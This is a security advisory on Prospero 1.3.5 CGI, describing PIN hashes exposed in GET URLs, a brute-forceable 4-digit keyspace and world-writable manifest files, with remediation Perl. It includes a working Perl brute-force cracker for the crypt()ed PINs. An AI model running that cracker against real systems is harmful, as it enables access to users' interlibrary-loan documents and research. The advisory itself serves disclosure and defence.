COMMAND

    Prospero

SYSTEMS AFFECTED

    Prospero 1.3.5 CGI

PROBLEM

    'darkyoda' found the following.  Prospero is a Web-based document
    delivery system designed as a complement to the Ariel software
    system.  Ariel is a product of the Research Libraries Group (RLG)
    which allows libraries to use the Internet to exchange documents
    through interlibrary loan.

    Client-side Prospero generates a random 3- or 4-digit PIN that
    users enter into a web-based form which grants them access to
    documents requested through interlibrary loan.  Because the form
    uses the GET method, the encrypted PIN appears in the URL and is
    therefore visible in the browser (address bar, history and any
    intermediate logs).  A perusal of login.pl reveals that the Perl
    crypt() function is used to encrypt the PIN.  Since the keyspace
    is at most 10,000 values, it is trivial for an attacker to
    recover the PIN by brute force; this would allow access to user
    documents, letting malicious users delete them arbitrarily or
    determine the subject of a user's research.

    In addition, login.pl creates its log and manifest files with 0666
    permissions.  The manifest file is the user database containing
    PINs and usernames.  Any local user, Prospero user or not, can
    modify or delete entries in this file at will.

    Exploit:

    #!/usr/bin/perl
    #
    # crack for prospero PINs
    # dY 12.15.00
    #
    # Reads a crypt()ed PIN (as seen in the GET request) and tries every
    # numeric value 0..9999 against it using the same two-character salt.
    printf("Enter encrypted PIN: ");
    chomp($passwd = <STDIN>);

    $salt = substr($passwd,0,2);   # traditional crypt(): salt is the first two chars

    $lowval = 0;
    $highval = 9999;

    for ($i = $lowval; $i <= $highval; $i++) {
            if (crypt($i, $salt) eq $passwd) {
                    print("***Unencrypted PIN is: $i\n");
                    exit(0);
            }
    }
    printf("Sorry, couldn't crack it. Try something > $highval.\n");
    exit(0);

SOLUTION

    Upgrade to the latest version, 1.3.7.  Note that the author has
    not reviewed the source of this latest version.  Sites that cannot
    upgrade should change the file permissions used in login.pl from
    0666 to 0660 and consider using complex alphanumeric PINs in lieu
    of the ones generated by Prospero.  Note that this will only slow
    an attacker, as the hash is still exposed via GET and could be
    brute-forced by an industrial password cracker such as John the
    Ripper.
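
    As an added example (not Prospero's own code), the two changes recommended
    above written as Perl a site could adapt into login.pl: creating the log and
    manifest files 0660 instead of 0666, an audit check for files already left
    world-writable, and a generator for alphanumeric PINs.  The file paths are
    assumptions.

```perl
#!/usr/bin/perl
# Added example, not Prospero's login.pl. Paths below are assumptions.
use strict;
use warnings;
use Fcntl qw(O_WRONLY O_APPEND O_CREAT);

my $MANIFEST = '/var/prospero/manifest';      # assumed user database path
my $LOGFILE  = '/var/prospero/prospero.log';  # assumed access log path

# Open a log or manifest file for appending, creating it 0660 rather than
# the 0666 reported in the advisory. The umask is tightened first so the
# CGI's inherited umask cannot widen the mode; an existing 0666 file is
# repaired with chmod.
sub open_restricted {
    my ($path) = @_;
    my $saved = umask(0007);
    sysopen(my $fh, $path, O_WRONLY | O_APPEND | O_CREAT, 0660)
        or die "cannot open $path: $!";
    umask($saved);
    chmod(0660, $path);
    return $fh;
}

# Audit check for an existing installation: 1 if the file is writable by
# users outside owner and group, 0 if not, undef if the file is missing.
sub is_world_writable {
    my ($path) = @_;
    my @st = stat($path) or return undef;
    return (($st[2] & 0002) ? 1 : 0);
}

# Generate a PIN from letters and digits instead of a 3- or 4-digit number.
# Bytes come from /dev/urandom; values >= 248 (4 * 62) are rejected so the
# modulo does not bias the choice. DES-based crypt() only uses the first
# eight characters, so longer PINs add nothing under that hash.
sub random_pin {
    my ($len) = @_;
    my @alphabet = ('A' .. 'Z', 'a' .. 'z', '0' .. '9');
    open(my $rnd, '<', '/dev/urandom') or die "cannot read /dev/urandom: $!";
    my $pin = '';
    while (length($pin) < $len) {
        read($rnd, my $byte, 1) == 1 or die "short read from /dev/urandom";
        my $v = ord($byte);
        next if $v >= 248;
        $pin .= $alphabet[$v % 62];
    }
    close($rnd);
    return $pin;
}

for my $f ($MANIFEST, $LOGFILE) {
    my $ww = is_world_writable($f);
    printf("%s: %s\n", $f, defined $ww ? ($ww ? "WORLD-WRITABLE" : "ok") : "missing");
}
print "new PIN: ", random_pin(8), "\n";
```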